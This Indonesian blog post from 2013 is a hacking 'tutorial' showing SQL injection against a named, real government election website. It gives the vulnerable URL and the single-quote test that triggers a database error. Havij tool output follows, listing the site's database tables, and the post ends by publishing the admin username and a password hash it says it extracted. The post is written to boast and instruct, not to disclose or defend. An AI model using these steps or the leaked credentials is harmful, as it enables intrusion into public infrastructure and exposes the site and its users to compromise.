Selasa, 02 Juli 2013

Hack DCS.KPU.GO.ID

Sore kaka-kaka semua saya ingin memberikan sebuah tutorial iseng-iseng semoga aja bermanfaat.Mau tau kesiapan pemilu 2014 dari segi IT nya (eh ternyata belom siap) To the point aja deh...
pertama langsung ke TKP aja yah http://www.dcs.kpu.go.id

terus pilih salah satu partai contoh :

http://dcs.kpu.go.id/index.php?go=dcs-dpr&partai=01

jika kita kasih tanda kutip apa yang akan terjadi


http://dcs.kpu.go.id/index.php?go=dcs-dpr&partai=01'

tralala..lala..

"Gagal query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''01''' at line 1"

tuh kan bener belom siap dari sisi IT nya...ehhee

Langsung aja kita buka tools Havij pake versi apa aja terus scan dan hasilnya kita bisa liat :


Quote:Havij 1.152 Pro!
Analyzing http://dcs.kpu.go.id/index.php?go=dcs-dpr&partai=01
Host IP: 103.21.228.23
Web Server: Apache/2.2.22
Powered-by: PHP/5.4.4-14+deb7u2
Can not find keyword but let me do a try!
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 7
Injection type is String (')
Cannot find string column!
Current DB: dapildb
MySQL error based injection method can be used!
Count(table_name) of information_schema.tables where table_schema=0x646170696C6462 is 42
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x646170696C6462 is 42
Table found: bagian_kab
Table found: bagian_kec
Table found: content
Table found: dpkab
Table found: dpprop
Table found: dppusat
Table found: fagama
Table found: fbacaleg_dpd
Table found: fbacaleg_dpr
Table found: fbacaleg_dpr_backup
Table found: fbacaleg_dprd1
Table found: fbacaleg_dprd2
Table found: fdaerah
Table found: fdp_dpr
Table found: fdp_dprd1
Table found: fdp_dprd2
Table found: fkec
Table found: fklurah
Table found: fkursikab
Table found: fkursiprop
Table found: fkursipusat
Table found: fpartai
Table found: fpekerjaan
Table found: fpendidikan
Table found: fprop
Table found: fstatus
Table found: gallery
Table found: logs
Table found: menu
Table found: messenger
Table found: news
Table found: posisi
Table found: sidebar
Table found: slider
Table found: template
Table found: tps
Table found: user
Table found: user_oauth
Table found: user_profile
Table found: user_role
Table found: users
Table found: users_profile

haha...dan akhirnya sampai dapat username dan passwordnya

Data Found: username=admin
Data Found: password=D31A823FCA7D722CCA8A6F6355A42474

sekian tutorial iseng iseng ini semoga bermanfaat untuk kita semua dan kemajuan bangsa kita...

Thanks...

exTwo.*x2 | CIPUTAT CYBER TEAM[/quote]
Diposting oleh di
Label: ,

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

Photobucket

Kalo mau Copas / copy paste cantumkan sumbernya ya gan :D
 
™[H]elmi_[H]acker's™ © 2011 Templates | uzanc